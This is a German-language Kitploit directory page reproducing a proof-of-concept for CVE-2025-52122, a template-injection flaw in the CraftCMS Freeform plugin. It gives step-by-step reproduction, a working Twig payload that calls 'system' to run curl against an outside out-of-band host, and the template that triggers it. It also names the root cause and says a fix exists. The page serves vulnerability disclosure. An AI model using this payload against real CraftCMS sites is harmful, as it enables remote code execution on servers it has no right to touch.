Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-52122 — Beliebige Code-Injektion in CraftCMS Freeform 5.0.0 < 5.10.16 | Kitploit
Tools/GitHubGitHub/timtrademark/cve-2025-52122
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubtimtrademark/cve-2025-52122

CVE-2025-52122

Beliebige Code-Injektion in CraftCMS Freeform 5.0.0 < 5.10.16

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE CraftCMS Freeform

CraftCMS Freeform enthält eine SSTI-Schwachstelle, die zu einer willkürlichen Code-Injektion für alle Benutzer führt, die Zugriff auf die Bearbeitung eines Formulars (Submission Title) haben.

Betroffene Versionen sind v5.0.0 < v5.10.16.

Schritte zur Reproduktion

Ein Formular erstellen:

create a form

Ich habe hier als Proof-of-Concept das Formular "pentest" erstellt. Als nächstes unter den Einstellungen den folgenden Submission Title setzen (Domainnamen durch Ihren eigenen Server ersetzen):

root@kitploit:~
{{ 'system' | call('curl http://gwgyynafr4feu5xecukf1h2nqew5kw8l.oastify.com/rce') }}

submission title

Dies führt einen beliebigen Systemaufruf aus. In diesem Fall führe ich einen curl zu einem kontrollierten Server durch, der mich benachrichtigt, falls eingehende Verbindungen eingehen. Als nächstes dieses Formular in eine Vorlage/Seite einbinden und absenden:

root@kitploit:~
<h1>test</h1>
{% set form = freeform.form('pentest') %}

{% if form %}
  {{ form.render() }}
{% else %}
  <p>Form not found.</p>
{% endif %}

Dadurch wird der curl-Befehl ausgeführt. Dies können wir überprüfen, indem wir die eingehende HTTP-Anfrage betrachten, die erstellt wurde:

incoming connection

Die Hauptursache dieses Problems ist, dass Freeform den "call"-Twig-Filter implementiert, ohne Benutzereingaben zu validieren. Dies wurde im folgenden Commit behoben.

Tool herunterladen